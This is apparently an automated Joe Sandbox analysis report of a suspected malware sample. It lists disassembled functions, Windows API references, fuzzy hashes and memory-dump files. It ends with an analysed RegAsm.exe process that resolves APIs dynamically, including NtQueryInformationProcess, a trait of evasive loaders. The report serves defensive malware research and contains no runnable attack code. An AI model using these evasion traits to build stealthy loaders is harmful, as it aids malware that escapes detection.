Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3170801528-0
Opcode ID: 4475b636f4b6daa432483bfe3b8c9abc6dfeee5bf802842ed03bec2671514418
Instruction ID: 1cffa071f0b04925715c71cdd645a9b02541f8eb3ff2216866f80cc9f19013b9
Opcode Fuzzy Hash: 4475b636f4b6daa432483bfe3b8c9abc6dfeee5bf802842ed03bec2671514418
Instruction Fuzzy Hash: 7801C431D01E11EBD72BAB65E8067DD7362BB8D721F054115E4066B280CB345DC1CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 002DB22E Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 002DB248
GetLastError.KERNEL32 ref: 002DB254
___initconout.LIBCMT ref: 002DB264

Part of subcall function 002DB2E2: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,002DB269), ref: 002DB2F5

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 002DB278

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CreateErrorFileLast___initconout
String ID:
API String ID: 3431868840-0
Opcode ID: 27ad367a5fe4e5342e456e8d338d10d786a637a37893dbe39afd6d64ba23f846
Instruction ID: 09a6ac71adbfa81c95f68c7d45b3621cf1eabee46959b791c7addfda0f2d0d22
Opcode Fuzzy Hash: 27ad367a5fe4e5342e456e8d338d10d786a637a37893dbe39afd6d64ba23f846
Instruction Fuzzy Hash: 48F05E3A110505ABCB231F96DC48A4A7FABFF89320F124419FA8A92670DB3198209B51

Uniqueness

Uniqueness Score: -1.00%

Function 002DB34A Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 002DB361
GetLastError.KERNEL32 ref: 002DB36D
___initconout.LIBCMT ref: 002DB37D

Part of subcall function 002DB2E2: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,002DB269), ref: 002DB2F5

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 002DB392

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CreateErrorFileLast___initconout
String ID:
API String ID: 3431868840-0
Opcode ID: 740c72af06a9015d7915cecd1b95b222b80b433a400429f149756033a90e0797
Instruction ID: 3ad7fa612ca40cc3f039449932c069c79cfe29d07754dffc01be4f97cc49a498
Opcode Fuzzy Hash: 740c72af06a9015d7915cecd1b95b222b80b433a400429f149756033a90e0797
Instruction Fuzzy Hash: DAF01C36010119FBCF231FA2DC48A8D3F6AFF083A0F024010FE0995270D7328D20AB92

Uniqueness

Uniqueness Score: -1.00%

Function 002C3548 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 359COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 002C35EE
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 002C3834

Strings

E-<E, xrefs: 002C3553, 002C376C

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastStringType
String ID: E-<E
API String ID: 1924812101-3361631808
Opcode ID: 09c608fcc21a5d1092d10f0651d5160c89ed04ac83620de1e400f63fb98fd1b3
Instruction ID: 64e33ba9398f75fe4a8a761dab00b85cf6c24331405296f858d6022080a14bab
Opcode Fuzzy Hash: 09c608fcc21a5d1092d10f0651d5160c89ed04ac83620de1e400f63fb98fd1b3
Instruction Fuzzy Hash: 3A81A2B1920216ABDF21DF658C41FAE7BB9AF44710F148699F804E7251DB31CE60CF60

Uniqueness

Uniqueness Score: -1.00%

Function 002CAD03 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

Part of subcall function 002CA668: GetOEMCP.KERNEL32(00000000), ref: 002CA693

IsValidCodePage.KERNEL32(-00000030), ref: 002CAD64
GetCPInfo.KERNEL32(00000000,?), ref: 002CADA6

Strings

E-<E, xrefs: 002CAD0B

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID: E-<E
API String ID: 546120528-3361631808
Opcode ID: 20aa4679ac3d6efb4312de1dca7bed1b708325ea39d4ee6fd5c8b318bc625f2a
Instruction ID: 5d4a5d044a01c297dcec68cbd7bd590756ba1f683a0d87b9e88cd08cd0183b53
Opcode Fuzzy Hash: 20aa4679ac3d6efb4312de1dca7bed1b708325ea39d4ee6fd5c8b318bc625f2a
Instruction Fuzzy Hash: 32513670A2074A8EDB21CF75C880BAABBF4EF41308F14467ED08687651D7759956CB92

Uniqueness

Uniqueness Score: -1.00%

Function 002CA793 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(0000FDE9,?), ref: 002CA7C5

Strings

E-<E, xrefs: 002CA79E
, xrefs: 002CA80A

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: Info
String ID: $E-<E
API String ID: 1807457897-1798675469
Opcode ID: 09342ed4b91b9607c54a837d4ae3a130e871343ea1b11ac50244e6d3db4c8534
Instruction ID: d0c21787605a0acfc70d85e5ecf23a27755998efb12484458fd875675d222c71
Opcode Fuzzy Hash: 09342ed4b91b9607c54a837d4ae3a130e871343ea1b11ac50244e6d3db4c8534
Instruction Fuzzy Hash: 5F5159B191425C9BDB218E28CC84FE67BBCEB45308F2407EDE59AD7182C2749E56CF21

Uniqueness

Uniqueness Score: -1.00%

Function 0023346D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

SetConsoleCtrlHandler.KERNEL32(002C71F4,00000001,002F9FD8,00000018), ref: 002C77E1
GetLastError.KERNEL32 ref: 002C77F4

Strings

E-<E, xrefs: 002C781D

Memory Dump Source

Source File: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: ConsoleCtrlErrorHandlerLast
String ID: E-<E
API String ID: 3113525192-3361631808
Opcode ID: b123c8c9afddc74112ddbf07de52003e44256cb47244b0db51c073c2ee16c7b3
Instruction ID: cd2ca22d6e9b115493c3a9949ab65ab616b28160c1f0d96859cc7e72151f96ca
Opcode Fuzzy Hash: b123c8c9afddc74112ddbf07de52003e44256cb47244b0db51c073c2ee16c7b3
Instruction Fuzzy Hash: 3A412572A6824A8FDF259F6CD889FACB7A1AF55310F14036EE405AB260DB708C64DF51

Uniqueness

Uniqueness Score: -1.00%

Function 002C59DD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002C5AC6
GetLastError.KERNEL32 ref: 002C5AF6

Strings

E-<E, xrefs: 002C59EC

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: E-<E
API String ID: 442123175-3361631808
Opcode ID: cb87952d72774093eec2c521360f13fb1e4ef064afda0fb8ea6a3a5de6aa59e0
Instruction ID: 6b581654d914b09569d414383d2b4991e5bc97f2fff62eab57d89c3df5d55205
Opcode Fuzzy Hash: cb87952d72774093eec2c521360f13fb1e4ef064afda0fb8ea6a3a5de6aa59e0
Instruction Fuzzy Hash: C0319471A10629AFDB14CF6ADCC1BEA77B9EB44304F1442ADE505D7290D670EDD18F60

Uniqueness

Uniqueness Score: -1.00%

Function 002C58BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 002C5964
GetLastError.KERNEL32 ref: 002C598A

Strings

E-<E, xrefs: 002C58C9

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: E-<E
API String ID: 442123175-3361631808
Opcode ID: 0eb2f744da16c01f4f9984fe6b3cdf14f8bed9c211febdc89a21eaafe6ef5a12
Instruction ID: e56cf504fe399aa9147641ae710997cb31cdc78f7e351bb9d50134be290df178
Opcode Fuzzy Hash: 0eb2f744da16c01f4f9984fe6b3cdf14f8bed9c211febdc89a21eaafe6ef5a12
Instruction Fuzzy Hash: 01217171A10229DBCB15CF19DC81AA9B3B9FF48324F1445ADE909D7250D730EE91CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 002C57A9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 002C5845
GetLastError.KERNEL32 ref: 002C586B

Strings

E-<E, xrefs: 002C57B8

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: E-<E
API String ID: 442123175-3361631808
Opcode ID: e806f94038ea17a549fbb35a454d97bccd6d9f4a80bb09964ca00aba8b7bfa1e
Instruction ID: 3244a846387b2a84e68848da2bac7d814f8cca54433abcddc14a2fab22d0222b
Opcode Fuzzy Hash: e806f94038ea17a549fbb35a454d97bccd6d9f4a80bb09964ca00aba8b7bfa1e
Instruction Fuzzy Hash: 0E21A030A102299BCB19CF29DC80BDDB7B9EB48305F1442ADEA06D7251D630EED2CF64

Uniqueness

Uniqueness Score: -1.00%

Function 002C23FA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

Strings

InitializeCriticalSectionEx, xrefs: 002C245A
GetXStateFeaturesMask, xrefs: 002C240A

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
API String ID: 0-4196971266
Opcode ID: ae4e3157da6cb908f6ba15b9188fe466fa7460f9d2642d4a675946bbc8995435
Instruction ID: 2f98359035bdd4b03b5187589c68551db70ee9647623e4b3abe29bfef7e748ae
Opcode Fuzzy Hash: ae4e3157da6cb908f6ba15b9188fe466fa7460f9d2642d4a675946bbc8995435
Instruction Fuzzy Hash: 8801A7315E0258B7CF153F929C06F9E7E19DB41B61F414125FD1C191A1CAF15D7096D1

Uniqueness

Uniqueness Score: -1.00%

Function 002B808A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4), ref: 002B80A2
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 002B80F2

Strings

E-<E, xrefs: 002B8095

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: FileHandleWrite
String ID: E-<E
API String ID: 3320372497-3361631808
Opcode ID: 1786dd040fda85b216af04bb0d1e850c0230d3a93a364cd32acf98f1a9a65a20
Instruction ID: 5e1a73c251038a8873bf2bab97dcb7863df0c1a30bfa5a971d47db32b4dace5a
Opcode Fuzzy Hash: 1786dd040fda85b216af04bb0d1e850c0230d3a93a364cd32acf98f1a9a65a20
Instruction Fuzzy Hash: 0A01D83190515B9ECB15EF28C8449FEB7B8EF05398F0102FAD825932D0EE309E49CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 002CA399 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 002CA3BE
GetLastError.KERNEL32 ref: 002CA3C8

Strings

E-<E, xrefs: 002CA3A4

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: ErrorFileLastModuleName
String ID: E-<E
API String ID: 2776309574-3361631808
Opcode ID: 5943ab0c472ffcae7be889396e6ba67db7ab9bc6349be5bc2a70994818bd2382
Instruction ID: e3069b1351f0850e0e6fbda66f7a4214cbc8291d9535710b4620f88123bdc98f
Opcode Fuzzy Hash: 5943ab0c472ffcae7be889396e6ba67db7ab9bc6349be5bc2a70994818bd2382
Instruction Fuzzy Hash: 43112D7195421CEBCB14EFA4DC8DBDE77B8AB18304F1045DAE40AE7241DA709B94CF54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exePID: 4904, Parent PID: 7100COMMON

Execution Graph

Execution Coverage:	5.8%
Dynamic/Decrypted Code Coverage:	0.7%
Signature Coverage:	9.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	34

Executed Functions

Function 00418970 Relevance: 63.2, APIs: 34, Strings: 2, Instructions: 208
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll,0041887A), ref: 00418975
GetProcAddress.KERNEL32(00000000,0155F1E0), ref: 00418990
GetProcAddress.KERNEL32(74DD0000,0155F1F8), ref: 004189BD
GetProcAddress.KERNEL32(74DD0000,0155F360), ref: 004189D6
GetProcAddress.KERNEL32(74DD0000,0155F390), ref: 004189EE
GetProcAddress.KERNEL32(74DD0000,0155F510), ref: 00418A06
GetProcAddress.KERNEL32(74DD0000,01562EC0), ref: 00418A1F
GetProcAddress.KERNEL32(74DD0000,01562BE0), ref: 00418A37
GetProcAddress.KERNEL32(74DD0000,015629C0), ref: 00418A4F
GetProcAddress.KERNEL32(74DD0000,0155F498), ref: 00418A68
GetProcAddress.KERNEL32(74DD0000,0155F4F8), ref: 00418A80
GetProcAddress.KERNEL32(74DD0000,0155F540), ref: 00418A98
GetProcAddress.KERNEL32(74DD0000,0155F4E0), ref: 00418AB1
GetProcAddress.KERNEL32(74DD0000,01562CE0), ref: 00418AC9
GetProcAddress.KERNEL32(74DD0000,0155F528), ref: 00418AE1
GetProcAddress.KERNEL32(74DD0000,0155F4B0), ref: 00418AFA
GetProcAddress.KERNEL32(74DD0000,01562C40), ref: 00418B12
GetProcAddress.KERNEL32(74DD0000,0155F4C8), ref: 00418B2A
GetProcAddress.KERNEL32(74DD0000,0155F480), ref: 00418B43
GetProcAddress.KERNEL32(74DD0000,01562AC0), ref: 00418B5B
GetProcAddress.KERNEL32(74DD0000,0155C9F8), ref: 00418B73
GetProcAddress.KERNEL32(74DD0000,01562A60), ref: 00418B8C
LoadLibraryA.KERNEL32(0156DC08), ref: 00418B9D
LoadLibraryA.KERNEL32(0156DC20), ref: 00418BAF
LoadLibraryA.KERNEL32(0156DB78), ref: 00418BC1
LoadLibraryA.KERNEL32(0156DE00), ref: 00418BD2
LoadLibraryA.KERNEL32(0156DC50), ref: 00418BE4
GetProcAddress.KERNEL32(75A70000,0156DCF8), ref: 00418C00
GetProcAddress.KERNEL32(75290000,0156DC38), ref: 00418C1C
GetProcAddress.KERNEL32(75290000,0156DD10), ref: 00418C34
GetProcAddress.KERNEL32(75BD0000,0156DCB0), ref: 00418C50
GetProcAddress.KERNEL32(75450000,01562D20), ref: 00418C6C
GetProcAddress.KERNEL32(76E90000,01562F00), ref: 00418C88
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00418C9F

Strings

NtQueryInformationProcess, xrefs: 00418C94
kernel32.dll, xrefs: 00418970

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
